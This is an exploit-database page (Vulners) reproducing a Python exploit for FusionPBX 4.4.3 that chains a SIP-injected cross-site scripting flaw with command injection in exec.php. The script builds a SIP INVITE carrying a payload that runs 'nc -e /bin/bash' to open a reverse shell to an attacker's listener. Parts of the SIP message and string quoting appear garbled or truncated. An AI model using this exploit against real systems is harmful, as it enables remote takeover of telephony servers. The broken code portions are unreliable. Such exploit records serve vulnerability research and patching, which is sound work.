Vulners
Lucene search
FusionPBX 4.4.3 - Remote Command Execution Exploit #RCE
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | FusionPBX Operator Panel (exec.php) Command Execution Exploit | 15 Nov 201900:00 | – | zdt |
 | CVE-2019-11409 | 13 Nov 201917:44 | – | circl |
 | FusionPBX Operator Panel Module Cross-Site Scripting Vulnerability | 13 Jun 201900:00 | – | cnvd |
| FusionPBX Operator Panel module cross-site scripting vulnerability (CNVD-2019-40060) | 13 Jun 201900:00 | – | cnvd |
 | CVE-2019-11408 | 17 Jun 201917:59 | – | cve |
| CVE-2019-11409 | 17 Jun 201918:02 | – | cve |
 | CVE-2019-11408 | 17 Jun 201917:59 | – | cvelist |
| CVE-2019-11409 | 17 Jun 201918:02 | – | cvelist |
 | FusionPBX 4.4.3 - Remote Command Execution | 12 Jun 201900:00 | – | exploitdb |
| FusionPBX - Operator Panel exec.php Command Execution (Metasploit) | 20 Nov 201900:00 | – | exploitdb |
10
# Exploit Title: FusionPBX <= 4.4.3 Command Injection RCE via XSS
# Date: 06-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://www.fusionpbx.com
# Software Link: https://https://github.com/fusionpbx/fusionpbx
# Version: <= 4.4.3
# Tested on: Debian 8.11
# CVE : CVE-2019-11408 (XSS) AND CVE-2019-11409 (Command Injection RCE)
#!/usr/bin/python
import socket, sys
from random import randint
from hashlib import md5
# Exploitation steps:
#
# 1. First, encode an XSS payload that will be injected into the
# “Caller ID Number” field, or “User” component of the SIP
# “From” URI.
# 2. Connect to external SIP profile port and send a SIP INVITE
# packet with XSS payload injected into the From Field.
# 3. XSS payload will fire operator panel screen (CVE-2019-11408), which
# is designed to be monitored constantly by a call center operator.
# 4. Once XSS code executes, a call is made to the exec.php script
# (CVE-2019-11409) with a reverse shell payload that connects back to
# a netcat listener on the attacker system.
# edit these variables to set up attack
victim_addr="10.10.10.10"
victim_host="victim-pbx1.example.com"
victim_num="12125551212"
attacker_ip="10.10.10.20"
attacker_port=4444
def encode(val):
ret=""
for c in val:
ret+="\\x%02x" % ord(c)
return ret
callid=md5(str(randint(0,99999999))).hexdigest()
cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port)
payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd
xss=";tag=%s
To:
Call-ID: %s
CSeq: 1 INVITE
Contact:
Max-Forwards: 70
User-Agent: Exploit POC
Content-Type: application/sdp
Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE
Content-Length: 209
v=0
o=root 1204310316 1204310316 IN IP4 127.0.0.1
s=Media Gateway
c=IN IP4 127.0.0.1
t=0 0
m=audio 4446 RTP/AVP 0 101
a=rtpmap:0 PCMU/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16
a=ptime:2
a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid)
payload=payload.replace("\n","\r\n")
s=socket.socket()
s.connect((victim_addr,5080))
print payload
print
s.send(payload)
data=s.recv(8192)
print data
# 0day.today [2019-06-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jun 2019 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.86498